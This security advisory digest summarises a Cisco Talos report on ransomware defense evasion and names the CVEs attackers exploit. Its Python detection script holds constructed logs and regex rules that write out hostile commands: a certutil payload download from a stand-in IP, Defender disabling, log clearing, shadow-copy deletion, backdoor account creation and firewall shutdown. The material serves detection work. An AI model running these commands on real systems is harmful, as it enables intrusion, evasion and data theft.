Ransomware Groups Prioritize Defense Evasion for Data Exfiltration

Summary:
Ransomware attackers are increasingly focusing on defense evasion tactics to extend their dwell time within victim networks, as highlighted in a new report by Cisco Talos. This shift is primarily driven by the double-extortion ransomware model, in which attackers steal sensitive data and threaten to publish it online in addition to encrypting victims' systems. Attackers want persistent access so they can map the network, locate valuable resources, and identify data worth stealing before they deploy the ransomware. The Cisco Talos report analyzed the tactics, techniques, and procedures (TTPs) of the 14 most active ransomware groups from 2023 to 2024.

To evade detection, ransomware groups disable or modify security software, obfuscate their tooling by packing and compressing the code, modify the system registry to suppress security alerts, configure their tools to execute at startup, and block recovery options such as backups and system restore so that victims cannot recover without paying. Persistence techniques include automated malware persistence mechanisms and the installation of legitimate remote access software. Attackers exploit weak access controls and elevate privileges using local utilities and legitimate services, relying on "living-off-the-land" techniques that blend in with normal OS activity. This involves network scanner utilities and built-in operating system tools such as Certutil, Wevtutil, Net, Nltest, and Netsh.

After gaining persistent access, attackers locate and exfiltrate sensitive data before deploying the ransomware payload. They stage the data with compression and encryption utilities such as WinRAR and 7-Zip, which hides the contents of the archives from inspection and makes the exfiltration harder to spot. Ransomware-as-a-service (RaaS) groups, such as LockBit, even use custom data exfiltration tools such as StealBit. Increasingly, attackers exploit known and zero-day vulnerabilities in public-facing applications for initial access, which can also provide privilege escalation and persistent access. Cisco Talos highlighted three repeatedly exploited vulnerabilities: CVE-2020-1472 (Zerologon), CVE-2018-13379, and CVE-2023-0669.
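As an added illustration (not code from the Talos report or the article) of how the living-off-the-land, recovery-blocking and archive-staging commands described above can be hunted in process-creation telemetry, the following Python script runs a small rule set over constructed Sysmon-style events and then correlates the hits per host, on the reasoning that a single LOLBin call is usually benign while several of these tactics on one host in a short window is the pattern the report describes. The log format, host names, users, command lines and the per-technique command-line patterns are all assumptions made for this example.

```python
"""Detection sweep for living-off-the-land, recovery-blocking and archive-staging
commands, run over constructed Windows process-creation events.

Added example, not code from Cisco Talos or the article. Every log line below
is constructed for the example, and each command-line pattern is this example's
assumption about how the technique typically appears in Sysmon event 1 / 4688
telemetry, not a list taken from the report.
"""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    tactic: str      # coarse label used for per-host correlation
    images: tuple    # lower-case executable basenames the rule applies to
    pattern: str     # regex over the command line, matched case-insensitively


RULES = [
    Rule("certutil_download_or_decode", "tool-staging", ("certutil.exe",),
         r"-(urlcache|decode|encode)\b"),
    Rule("wevtutil_clear_log", "defense-evasion", ("wevtutil.exe",),
         r"\b(cl|clear-log)\b"),
    Rule("registry_disable_defender", "defense-evasion", ("reg.exe",),
         r"windows defender.*disableantispyware"),
    Rule("netsh_firewall_change", "defense-evasion", ("netsh.exe",),
         r"advfirewall\s+(set|firewall\s+add)"),
    Rule("nltest_domain_discovery", "discovery", ("nltest.exe",),
         r"/(dclist|domain_trusts|dsgetdc)"),
    Rule("net_account_add", "persistence", ("net.exe", "net1.exe"),
         r"\b(user|localgroup)\b.*\s/add\b"),
    Rule("run_key_persistence", "persistence", ("reg.exe",),
         r"currentversion\\run\b"),
    Rule("shadow_copy_deletion", "recovery-blocking", ("vssadmin.exe",),
         r"delete\s+shadows"),
    Rule("bcdedit_disable_recovery", "recovery-blocking", ("bcdedit.exe",),
         r"recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures"),
    Rule("password_protected_archive", "exfil-staging",
         ("rar.exe", "winrar.exe", "7z.exe", "7za.exe"),
         r"\ba\b.*\s-(hp|p)\S+"),
]
COMPILED = [(r, re.compile(r.pattern, re.IGNORECASE)) for r in RULES]

# Constructed sample telemetry: "<ts> host=<h> user=<u> image=<path> cmd=<cmdline>"
SAMPLE_LOG = r"""
2024-07-09T10:01:12Z host=WS-042 user=CORP\jdoe image=C:\Windows\System32\certutil.exe cmd=certutil -urlcache -split -f http://198.51.100.7/update.bin C:\Users\Public\update.bin
2024-07-09T10:01:40Z host=WS-042 user=CORP\jdoe image=C:\Windows\System32\certutil.exe cmd=certutil -verify C:\Users\jdoe\Desktop\vendor.cer
2024-07-09T10:03:05Z host=WS-042 user=CORP\jdoe image=C:\Windows\System32\reg.exe cmd=reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2024-07-09T10:04:17Z host=WS-042 user=CORP\jdoe image=C:\Windows\System32\nltest.exe cmd=nltest /dclist:corp.example
2024-07-09T10:05:02Z host=WS-042 user=CORP\jdoe image=C:\Windows\System32\net.exe cmd=net use Z: \\fs01\finance
2024-07-09T10:22:48Z host=WS-042 user=CORP\jdoe image="C:\Program Files\WinRAR\Rar.exe" cmd=rar a -r -hpStr0ngPw C:\Users\Public\fin.rar Z:\finance
2024-07-09T10:31:09Z host=WS-042 user=CORP\jdoe image=C:\Windows\System32\wevtutil.exe cmd=wevtutil cl Security
2024-07-09T10:31:15Z host=WS-042 user=CORP\jdoe image=C:\Windows\System32\bcdedit.exe cmd=bcdedit /set {default} recoveryenabled No
2024-07-09T11:02:33Z host=SRV-DB1 user=CORP\svc_sql image=C:\Windows\System32\net.exe cmd=net user backup_adm P@ssw0rd! /add
2024-07-09T11:02:51Z host=SRV-DB1 user=CORP\svc_sql image=C:\Windows\System32\reg.exe cmd=reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /d C:\Users\Public\update.exe /f
2024-07-09T11:03:10Z host=SRV-DB1 user=CORP\svc_sql image=C:\Windows\System32\netsh.exe cmd=netsh advfirewall set allprofiles state off
2024-07-09T11:40:00Z host=SRV-DB1 user=CORP\svc_sql image=C:\Windows\System32\vssadmin.exe cmd=vssadmin delete shadows /all /quiet
2024-07-09T12:00:00Z host=WS-017 user=CORP\asmith image=C:\Windows\System32\net.exe cmd=net user asmith
2024-07-09T12:05:00Z host=WS-017 user=CORP\asmith image="C:\Program Files\7-Zip\7z.exe" cmd=7z x C:\Users\asmith\Downloads\report.7z
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+user=(?P<user>\S+)\s+'
    r'image=(?P<image>"[^"]*"|\S+)\s+cmd=(?P<cmd>.*)$'
)


def parse_event(line):
    """Parse one constructed log line; returns None for blank or malformed lines."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["image"] = ev["image"].strip('"')
    # Executable basename, lower-cased, so rules key on "certutil.exe" not the path
    ev["basename"] = ev["image"].replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return ev


def match_rules(event):
    """All rules whose image list contains the process and whose regex hits the command line."""
    return [r for r, rx in COMPILED
            if event["basename"] in r.images and rx.search(event["cmd"])]


def scan(log_text):
    """Return one hit record per (event, rule) match across the whole log."""
    hits = []
    for line in log_text.splitlines():
        ev = parse_event(line)
        if ev is None:
            continue
        for rule in match_rules(ev):
            hits.append({"ts": ev["ts"], "host": ev["host"], "user": ev["user"],
                         "rule": rule.name, "tactic": rule.tactic, "cmd": ev["cmd"]})
    return hits


def assess_hosts(hits, threshold=3):
    """Return {host: set(tactics)} for hosts that touched >= threshold distinct tactics."""
    tactics = defaultdict(set)
    for h in hits:
        tactics[h["host"]].add(h["tactic"])
    return {host: t for host, t in tactics.items() if len(t) >= threshold}


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for h in found:
        print(f'{h["ts"]} {h["host"]:8} {h["rule"]:28} {h["cmd"][:60]}')
    for host, tactics in assess_hosts(found).items():
        print(f"ALERT {host}: {len(tactics)} distinct tactics -> {sorted(tactics)}")
```

In the constructed data, WS-042 and SRV-DB1 are flagged (five and three distinct tactics respectively) while WS-017, which only ran a `net user` query and a 7-Zip extraction, produces no hits at all. The per-host threshold is the part worth tuning in a real SIEM: the individual rules are deliberately broad because administrators use these same tools, so the signal comes from the combination.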

Security Officer Comments:
CVE-2020-1472, or Zerologon, is a cryptographic flaw in the Netlogon Remote Protocol that lets an unauthenticated attacker with network access to a domain controller impersonate the DC and reset its machine account password, which amounts to a full Active Directory takeover. CVE-2018-13379 is a path traversal flaw in the web portal of Fortinet's FortiOS SSL VPN that lets an unauthenticated attacker read system files, including session files containing plaintext credentials, which can then be used to log in and move laterally. CVE-2023-0669 is a pre-authentication deserialization flaw in the administration console of Fortra's GoAnywhere Managed File Transfer that allows remote code execution on the server, giving the attacker a foothold from which to conduct internal reconnaissance and lateral movement.

Suggested Corrections:
Cisco Talos highlighted key steps organizations should take to mitigate the TTPs employed by ransomware groups. These are:

  • Apply patches and updates regularly to all systems and software
  • Implement strong password policies and enforce multi-factor authentication (MFA) for each account
  • Minimize attack surfaces by disabling unnecessary services and features, and apply best practices to harden all systems and environments
  • Segment networks using VLANs or similar technologies to isolate sensitive data and systems, limiting an attacker's ability to move laterally
  • Implement a Security Information and Event Management (SIEM) system to continuously monitor and analyze security events
  • Adopt a least-privilege approach, ensuring that users and systems have only the minimal level of access necessary to perform their functions
  • Minimize your IT systems' exposure to the internet by limiting the number of public-facing services and ensuring robust protections for any necessary external interfaces

Link(s):
https://www.infosecurity-magazine.com/news/ransomware-defense-evasion-data/